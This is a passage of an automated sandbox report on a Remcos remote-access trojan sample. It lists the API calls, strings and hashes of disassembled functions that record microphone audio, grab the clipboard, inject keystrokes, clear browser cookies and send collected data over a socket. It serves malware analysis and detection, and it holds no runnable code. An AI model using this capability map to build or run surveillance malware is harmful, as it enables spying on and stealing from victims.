                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b79e0bacf68e79f56bbfbff6a95aeb92d11d955db7cfd18af0a5c0e52fbe5259
                                                          • Instruction ID: 8081305e108bfff8a8e14cd18a234b42858a69a1a1930647e7f2335dd99175ec
                                                          • Opcode Fuzzy Hash: b79e0bacf68e79f56bbfbff6a95aeb92d11d955db7cfd18af0a5c0e52fbe5259
                                                          • Instruction Fuzzy Hash: 44C105B0D04249AFEF11DFA9C8417BEBBB4EF09314F04415AE544A7392C738D941CBA9
                                                          Function 00452D3A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00453013,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452DE6
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00453013,00000000,00000000,?,00000001,?,?,?,?), ref: 00452E69
                                                          • __alloca_probe_16.LIBCMT ref: 00452EA1
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00453013,?,00453013,00000000,00000000,?,00000001,?,?,?,?), ref: 00452EFC
                                                          • __alloca_probe_16.LIBCMT ref: 00452F4B
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00453013,00000000,00000000,?,00000001,?,?,?,?), ref: 00452F13
                                                            • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00453013,00000000,00000000,?,00000001,?,?,?,?), ref: 00452F8F
                                                          • __freea.LIBCMT ref: 00452FBA
                                                          • __freea.LIBCMT ref: 00452FC6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                          • String ID:
                                                          • API String ID: 201697637-0
                                                          • Opcode ID: 636d8ee8978a4b28d28c899fe5287c94f7ea3d2e518637072967bc6aea0c1ce5
                                                          • Instruction ID: e285173fe66e9ab68cc8b5f7bb46492c032c90826bba7407019ac45f59d87ef3
                                                          • Opcode Fuzzy Hash: 636d8ee8978a4b28d28c899fe5287c94f7ea3d2e518637072967bc6aea0c1ce5
                                                          • Instruction Fuzzy Hash: E991D572E002169BDF208E64DA41AEFBBB5AF0A312F14055BFC05E7242D778DC48C768
                                                          Function 00444609 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                          • _memcmp.LIBVCRUNTIME ref: 004448B3
                                                          • _free.LIBCMT ref: 00444924
                                                          • _free.LIBCMT ref: 0044493D
                                                          • _free.LIBCMT ref: 0044496F
                                                          • _free.LIBCMT ref: 00444978
                                                          • _free.LIBCMT ref: 00444984
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                          • String ID: C
                                                          • API String ID: 1679612858-1037565863
                                                          • Opcode ID: 614205798ad6061f3d9420df6d0f7eb30440e43e095dda7afa9147f4421e103d
                                                          • Instruction ID: ce46d41f1d9e01bafc0896c2bb0d2adb680072b6a59d341745b23d3028246374
                                                          • Opcode Fuzzy Hash: 614205798ad6061f3d9420df6d0f7eb30440e43e095dda7afa9147f4421e103d
                                                          • Instruction Fuzzy Hash: 24B14975A012199FEB24DF18C884BAEB7B4FF49314F1045AEE849A7351D738AE90CF48
                                                          Function 00413A9F Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tcp$udp
                                                          • API String ID: 0-3725065008
                                                          • Opcode ID: af4d639371690cb8637a3a63659cf8324f890a8ac4b6ebd8bb2dc9423f2fa13d
                                                          • Instruction ID: 641150f3fd0ea6af627c79cdc5c75230aa36f57d28899e04d0661f3c05bf373f
                                                          • Opcode Fuzzy Hash: af4d639371690cb8637a3a63659cf8324f890a8ac4b6ebd8bb2dc9423f2fa13d
                                                          • Instruction Fuzzy Hash: 0D71D1716083528FDB24CF1994846ABB7E0AF84746F14442FF885A7352E77CDE81CB8A
                                                          Function 0044821F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171timeCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045E478), ref: 00448289
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0047279C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448301
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727F0,000000FF,?,0000003F,00000000,?), ref: 0044832E
                                                          • _free.LIBCMT ref: 00448277
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          • _free.LIBCMT ref: 00448443
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID: xE$xE
                                                          • API String ID: 1286116820-1741595589
                                                          • Opcode ID: 1f630aa574f8f032912558e332746922b811222e22d4e5e5c8fa9a473f36de46
                                                          • Instruction ID: 82a604bb7294b81f3f73b5ad664ce4632eb81d562d18d3de5c52697f85b56542
                                                          • Opcode Fuzzy Hash: 1f630aa574f8f032912558e332746922b811222e22d4e5e5c8fa9a473f36de46
                                                          • Instruction Fuzzy Hash: 43510871900219ABEB14EF698D819AE77BCEF44B14F1002AFF854A3291EF788D418B5C
                                                          Function 00412D60 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412D99
                                                            • Part of subcall function 00412A82: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412AF5
                                                            • Part of subcall function 00412A82: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412B24
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          • RegCloseKey.ADVAPI32(TeFTeF,00466554,00466554,00466900,00466900,00000071), ref: 00412F09
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumInfoOpenQuerysend
                                                          • String ID: TeF$TeFTeF$NG$TG$TG
                                                          • API String ID: 3114080316-3278504382
                                                          • Opcode ID: 21c71a250b61d8481e14fb29f658506147abfbd5a14f52d08b2dadadcd8e3add
                                                          • Instruction ID: 217e792c851e8857c64f97df11b7492b8bc11e7bd79a931969a0b124146415da
                                                          • Opcode Fuzzy Hash: 21c71a250b61d8481e14fb29f658506147abfbd5a14f52d08b2dadadcd8e3add
                                                          • Instruction Fuzzy Hash: ED41A1316042005BD224F725D8A2AEF7395AFD0308F50843FF94A671E2EF7C5D4986AE
                                                          Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00466454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                            • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                            • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                          • String ID: .part
                                                          • API String ID: 1303771098-3499674018
                                                          • Opcode ID: b78f9c0dad55f8f19791313ae5084cf2035b383ecf8786089be001690557f36c
                                                          • Instruction ID: 7eae26b3d9efd85ab9a821acf87acbbc445967fcd6ce231ca79d13f55b5b668b
                                                          • Opcode Fuzzy Hash: b78f9c0dad55f8f19791313ae5084cf2035b383ecf8786089be001690557f36c
                                                          • Instruction Fuzzy Hash: C631A4715083019FD210EF21DD459AFB7A8FB84755F40093EF9C6B21A1DF38AA48CB9A
                                                          Function 0040B6EA Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004125EB: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0041260F
                                                            • Part of subcall function 004125EB: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0041262C
                                                            • Part of subcall function 004125EB: RegCloseKey.KERNEL32(?), ref: 00412637
                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders$TeF
                                                          • API String ID: 1133728706-3101562037
                                                          • Opcode ID: f8e7fb648c548857668710dd0e9519a80c5674c84583f57a4e2fba272261da1f
                                                          • Instruction ID: 7ed93d3ebd4d115a7197ccd8f2df160251767479400bef64a6787df62d4369c8
                                                          • Opcode Fuzzy Hash: f8e7fb648c548857668710dd0e9519a80c5674c84583f57a4e2fba272261da1f
                                                          • Instruction Fuzzy Hash: 29215C31A1410966CB04F7B2CCA69EE7764AE94318F40013FA902771D2EF789A4986DE
                                                          Function 0040196B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                          • waveInOpen.WINMM(00472AF8,000000FF,00472B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                          • waveInPrepareHeader.WINMM(00472AC0,00000020,00000000), ref: 00401A66
                                                          • waveInAddBuffer.WINMM(00472AC0,00000020), ref: 00401A75
                                                          • waveInStart.WINMM ref: 00401A81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                          • String ID: dMG$|MG
                                                          • API String ID: 1356121797-1683252805
                                                          • Opcode ID: 77e1d5555118943626de1adf0eca28b59d42989bc3a47fc9702db746b9fc2c03
                                                          • Instruction ID: 140f40b68b7a2e7574469051551963e155d477b90c1392cdc23a62cf20397fe9
                                                          • Opcode Fuzzy Hash: 77e1d5555118943626de1adf0eca28b59d42989bc3a47fc9702db746b9fc2c03
                                                          • Instruction Fuzzy Hash: 52215C316002019BC725DF66EE1996A7BA6FB84710B00883EF50DE76B0DBF898C0CB5C
                                                          Function 0041C0BB Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AllocConsole.KERNEL32(004750FC), ref: 0041C0C4
                                                          • GetConsoleWindow.KERNEL32 ref: 0041C0CA
                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041C0DD
                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041C102
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Console$Window$AllocOutputShow
                                                          • String ID: Remcos v$6.0.0 Pro$CONOUT$
                                                          • API String ID: 4067487056-3561919337
                                                          • Opcode ID: 51f71f4df576cdb042b408fdcee2c306aad9b55f4cf694b49fe88f2f6d88a06c
                                                          • Instruction ID: 9cd6404a4583bb7861016a5e8077681a34a6ce6b29b6da971a73374578d830bb
                                                          • Opcode Fuzzy Hash: 51f71f4df576cdb042b408fdcee2c306aad9b55f4cf694b49fe88f2f6d88a06c
                                                          • Instruction Fuzzy Hash: 750121B1A80304BADA10F7F19D4BF9976AC6B14B09F500426BA05A70C2EEB8A554462D
                                                          Function 00449B60 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D774,0043D774,?,?,?,00449DB1,00000001,00000001,1AE85006), ref: 00449BBA
                                                          • __alloca_probe_16.LIBCMT ref: 00449BF2
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449DB1,00000001,00000001,1AE85006,?,?,?), ref: 00449C40
                                                          • __alloca_probe_16.LIBCMT ref: 00449CD7
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449D3A
                                                          • __freea.LIBCMT ref: 00449D47
                                                            • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          • __freea.LIBCMT ref: 00449D50
                                                          • __freea.LIBCMT ref: 00449D75
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 3864826663-0
                                                          • Opcode ID: 45550f184a61a9f8ddf17f24dc0c1f131df532b020593bc4805c091103afbf88
                                                          • Instruction ID: b9264d00d576e3e69c3e593975f72d59ef517f4fd458bc34bb1ef2c80a576446
                                                          • Opcode Fuzzy Hash: 45550f184a61a9f8ddf17f24dc0c1f131df532b020593bc4805c091103afbf88
                                                          • Instruction Fuzzy Hash: 3651F8B2A10206AFFB258F65DC82EBF77A9EB44754F15462EFC05DB240EB38DC409658
                                                          Function 00418CB4 Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendInput.USER32 ref: 00418CFE
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00418D26
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418D4D
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418D6B
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418D8B
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418DB0
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418DD2
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00418DF5
                                                            • Part of subcall function 00418CA7: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418CAD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InputSend$Virtual
                                                          • String ID:
                                                          • API String ID: 1167301434-0
                                                          • Opcode ID: 03d106074c487e793b96b2f05eb270ad55284c326fdeb905245ef2a17d2a5417
                                                          • Instruction ID: 141eef32e971302722b3407f09031bac5ba220a7556c2b6a6b809b2d6bbc12e7
                                                          • Opcode Fuzzy Hash: 03d106074c487e793b96b2f05eb270ad55284c326fdeb905245ef2a17d2a5417
                                                          • Instruction Fuzzy Hash: 2D318031258349A9E210DF65DC41FDFBBECAFC9B08F04080FB58457191EAA4858C87AB
                                                          Function 00415BDD Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 00415BDE
                                                          • EmptyClipboard.USER32 ref: 00415BEC
                                                          • CloseClipboard.USER32 ref: 00415BF2
                                                          • OpenClipboard.USER32 ref: 00415BF9
                                                          • GetClipboardData.USER32(0000000D), ref: 00415C09
                                                          • GlobalLock.KERNEL32(00000000), ref: 00415C12
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415C1B
                                                          • CloseClipboard.USER32 ref: 00415C21
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                          • String ID:
                                                          • API String ID: 2172192267-0
                                                          • Opcode ID: c3bbb9bbde72810014a30b189257db169a48326f431590227c3d1d8f527ca17d
                                                          • Instruction ID: 369576e1793333014f6cd695595c81a654a0099a6e7e621b1e9fba3c04e1709a
                                                          • Opcode Fuzzy Hash: c3bbb9bbde72810014a30b189257db169a48326f431590227c3d1d8f527ca17d
                                                          • Instruction Fuzzy Hash: EE0152322003009FC350BF71DC59AAE77A5AF80B42F00443FFD06A61A2EF35C949C659
                                                          Function 00446369 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
